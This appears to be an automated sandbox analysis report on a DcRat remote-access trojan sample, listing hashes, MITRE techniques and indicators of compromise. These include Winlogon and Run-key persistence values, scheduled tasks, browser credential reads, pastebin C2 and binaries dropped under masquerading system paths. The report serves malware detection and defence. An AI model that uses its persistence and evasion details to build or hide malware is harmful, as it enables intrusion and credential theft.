dcrat | 619ce969d1ec179adf72a87b08468986fa2cb537229a5e8fd03d00856f502200

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-01-2025 14:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

launcher.exe.bin.exe
Size

7.2MB
MD5

ff391ed9e21485241544944ec6f4a3f0
SHA1

bd7b5ce885c4684e05c1e937e46e9ef4ad06548c
SHA256

619ce969d1ec179adf72a87b08468986fa2cb537229a5e8fd03d00856f502200
SHA512

b9e9beffde62433911ac96fa3461f5c453dc10c6c760d2a7aa6df04573d1661d064cdcbe49507cecd59238410a671e1aeebf2858235ec9a31b91b5891203d5eb
SSDEEP

98304:MHAnOWlogrB1cyZ/KHH3+nnE6ohJMWLXfdYzOn5BNNARHjdSC8BHeqz:MHADlogrBayZ/K02hJuc4RZV8FeM

Score

10^/10

dcrat discovery evasion execution infostealer persistence rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\explorer.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\explorer.exe\", \"C:\\Recovery\\WindowsRE\\wininit.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\explorer.exe\", \"C:\\Recovery\\WindowsRE\\wininit.exe\", \"C:\\fontdriversavescrt\\csrss.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\explorer.exe\", \"C:\\Recovery\\WindowsRE\\wininit.exe\", \"C:\\fontdriversavescrt\\csrss.exe\", \"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\launcher.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\explorer.exe\", \"C:\\Recovery\\WindowsRE\\wininit.exe\", \"C:\\fontdriversavescrt\\csrss.exe\", \"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\launcher.exe\", \"C:\\Program Files\\Mozilla Firefox\\browser\\features\\explorer.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\explorer.exe\", \"C:\\Recovery\\WindowsRE\\wininit.exe\", \"C:\\fontdriversavescrt\\csrss.exe\", \"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\launcher.exe\", \"C:\\Program Files\\Mozilla Firefox\\browser\\features\\explorer.exe\", \"C:\\fontdriversavescrt\\ComComponentDriverInto.exe\""	ComComponentDriverInto.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3268	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1872	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1408	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1576	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1068	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4588	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1332	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3596	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3140	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5088	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3728	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4560	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1468	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	208	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5068	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4156	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1096	2004	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3564	2004	schtasks.exe	91

Suspicious use of NtCreateUserProcessOtherParentProcess 14 IoCs

description	pid	Process	procid_target
PID 436 created 3532	436	hs.exe	56
PID 436 created 3532	436	hs.exe	56
PID 436 created 3532	436	hs.exe	56
PID 436 created 3532	436	hs.exe	56
PID 436 created 3532	436	hs.exe	56
PID 436 created 3532	436	hs.exe	56
PID 208 created 3532	208	updater.exe	56
PID 208 created 3532	208	updater.exe	56
PID 208 created 3532	208	updater.exe	56
PID 208 created 3532	208	updater.exe	56
PID 208 created 3532	208	updater.exe	56
PID 208 created 3532	208	updater.exe	56
PID 208 created 3532	208	updater.exe	56
PID 3288 created 3324	3288	svchost.exe	167

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1764	powershell.exe
3272	powershell.exe
4408	powershell.exe
2960	powershell.exe
3940	powershell.exe
3060	powershell.exe
2924	powershell.exe
2188	powershell.exe
2944	powershell.exe
3940	powershell.exe
3324	powershell.exe
4820	powershell.exe
2284	powershell.exe
4976	powershell.exe
1128	powershell.exe
232	powershell.exe
628	powershell.exe
4188	powershell.exe
3572	powershell.exe
3540	powershell.exe
4700	powershell.exe
4380	powershell.exe

Disables Task Manager via registry modification
evasion

Sets service image path in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dosvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\UsoSvc\ImagePath = "C:\\Windows\\system32\\svchost.exe -k netsvcs -p"	WaaSMedicAgent.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	DCRatBuild.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	ComComponentDriverInto.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	launcher.exe.bin.exe

Executes dropped EXE 6 IoCs

pid	Process
436	hs.exe
4288	DCRatBuild.exe
1048	launcher.exe
208	updater.exe
4152	ComComponentDriverInto.exe
2636	wininit.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ComComponentDriverInto = "\"C:\\fontdriversavescrt\\ComComponentDriverInto.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ComComponentDriverInto = "\"C:\\fontdriversavescrt\\ComComponentDriverInto.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Recovery\\WindowsRE\\wininit.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\launcher = "\"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\launcher.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\launcher = "\"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\launcher.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\fontdriversavescrt\\csrss.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\fontdriversavescrt\\csrss.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files\\Mozilla Firefox\\browser\\features\\explorer.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files\\Mozilla Firefox\\browser\\features\\explorer.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Recovery\\WindowsRE\\explorer.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Recovery\\WindowsRE\\explorer.exe\""	ComComponentDriverInto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Recovery\\WindowsRE\\wininit.exe\""	ComComponentDriverInto.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
17	pastebin.com
16	pastebin.com

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2388	powercfg.exe
4924	powercfg.exe
4044	cmd.exe
3208	powercfg.exe
3464	powercfg.exe
592	powercfg.exe
1872	cmd.exe
1576	powercfg.exe
1276	powercfg.exe
4816	powercfg.exe

Drops file in System32 directory 27 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\csrssc	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	\??\c:\Windows\System32\s_kgxh.exe	csc.exe
File opened for modification	C:\Windows\System32\Tasks\wininit	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\explorere	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	\??\c:\Windows\System32\CSCCCAA06A3ED9442AAA71A8CCAD71A8499.TMP	csc.exe
File opened for modification	C:\Windows\System32\Tasks\ComComponentDriverInto	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\explorer	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\launcherl	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\wininitw	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\launcher	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\ComComponentDriverIntoC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\csrss	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 436 set thread context of 4920	436	hs.exe	103
PID 208 set thread context of 4848	208	updater.exe	124
PID 208 set thread context of 1176	208	updater.exe	131
PID 208 set thread context of 1080	208	updater.exe	132

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\explorer.exe	ComComponentDriverInto.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\explorer.exe	ComComponentDriverInto.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\7a0fd90576e088	ComComponentDriverInto.exe
File created	C:\Program Files (x86)\Windows Defender\ja-JP\launcher.exe	ComComponentDriverInto.exe
File created	C:\Program Files (x86)\Windows Defender\ja-JP\1aa39e3be4bdcc	ComComponentDriverInto.exe
File created	C:\Program Files\Google\Chrome\updater.exe	hs.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File created	C:\Windows\Logs\CBS\CBS.log	TrustedInstaller.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TrustedInstaller.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4124	sc.exe
3476	sc.exe
3112	sc.exe
2708	sc.exe
2348	sc.exe
1472	sc.exe
1128	sc.exe
2496	sc.exe
312	sc.exe
4084	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	launcher.exe.bin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuild.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
400	PING.EXE

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	dialer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 10 Jan 2025 14:22:46 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1736518966"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	DCRatBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	ComComponentDriverInto.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
540	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
400	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1872	schtasks.exe
3140	schtasks.exe
4560	schtasks.exe
4156	schtasks.exe
1096	schtasks.exe
3564	schtasks.exe
1332	schtasks.exe
3596	schtasks.exe
1068	schtasks.exe
3268	schtasks.exe
1408	schtasks.exe
5088	schtasks.exe
3728	schtasks.exe
1468	schtasks.exe
208	schtasks.exe
5068	schtasks.exe
1576	schtasks.exe
4588	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
436	hs.exe
436	hs.exe
3940	powershell.exe
3940	powershell.exe
436	hs.exe
436	hs.exe
436	hs.exe
436	hs.exe
436	hs.exe
436	hs.exe
436	hs.exe
436	hs.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
1764	powershell.exe
1764	powershell.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
1764	powershell.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
1764	powershell.exe
436	hs.exe
436	hs.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
4920	dialer.exe
